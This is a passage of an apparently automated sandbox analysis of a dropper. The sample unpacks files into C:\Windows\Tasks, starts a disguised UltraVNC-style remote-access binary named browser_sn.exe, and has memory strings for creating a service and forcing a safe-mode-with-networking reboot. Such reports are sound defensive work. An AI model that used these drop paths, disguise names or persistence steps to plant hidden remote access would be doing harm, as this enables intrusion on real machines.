                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winsta.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wldp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: T8xrZb7nBL.exeStatic file information: File size 1670955 > 1048576
                            Source: Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: uqVb3.kkb9h.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                            Source: T8xrZb7nBL.exeStatic PE information: real checksum: 0x2af97 should be: 0x1a1b11
                            Source: uqVb3.kkb9h.0.drStatic PE information: section name: .didat
                            Source: uqVb3.kkb9h.2.drStatic PE information: section name: .didat
                            Source: conhost.exe.8.drStatic PE information: section name: .didat
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C512EF push rbp; iretd 24_2_00007FF790C512F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4DC11 push rax; ret 24_2_00007FF790C4DC13
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C51400 push rbp; iretd 24_2_00007FF790C51401
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4DC01 push rcx; ret 24_2_00007FF790C4DC02
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C68CF9 push 8B481074h; iretd 24_2_00007FF790C68CFF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C4DC21 push rsp; ret 24_2_00007FF790C4DC23
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3FEF1 push rcx; ret 24_2_00007FF790C3FEF2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C507F8 push rbp; iretd 24_2_00007FF790C507F9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C512EF push rbp; iretd 28_2_00007FF790C512F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4DC11 push rax; ret 28_2_00007FF790C4DC13
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C51400 push rbp; iretd 28_2_00007FF790C51401
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4DC01 push rcx; ret 28_2_00007FF790C4DC02
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C68CF9 push 8B481074h; iretd 28_2_00007FF790C68CFF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C4DC21 push rsp; ret 28_2_00007FF790C4DC23
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3FEF1 push rcx; ret 28_2_00007FF790C3FEF2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C507F8 push rbp; iretd 28_2_00007FF790C507F9

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\browser_sn.exeJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\browser_sn.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DygIR.vkc0fJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\DygIR.vkc0fJump to dropped file
                            Source: Xv6Ya.d8LhT.2.drBinary or memory string: bcdedit.exe
                            Source: Xv6Ya.d8LhT.2.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                            Source: browser_sn.exe.8.drBinary or memory string: bcdedit.exe
                            Source: browser_sn.exe.8.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                            Source: Xv6Ya.d8LhT.0.drBinary or memory string: bcdedit.exe
                            Source: Xv6Ya.d8LhT.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin24_2_00007FF790C381AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C3E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat24_2_00007FF790C3E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C89A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,24_2_00007FF790C89A40
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87BD0 GetPrivateProfileIntA,24_2_00007FF790C87BD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87C90 GetPrivateProfileIntA,24_2_00007FF790C87C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87E10 GetPrivateProfileIntA,24_2_00007FF790C87E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87D50 GetPrivateProfileIntA,24_2_00007FF790C87D50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87EB0 GetPrivateProfileIntA,24_2_00007FF790C87EB0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,24_2_00007FF790C87650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,24_2_00007FF790C877F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,24_2_00007FF790C87750
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C87F50 GetPrivateProfileIntA,24_2_00007FF790C87F50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 24_2_00007FF790C878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,24_2_00007FF790C878E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin28_2_00007FF790C381AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 28_2_00007FF790C3E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfil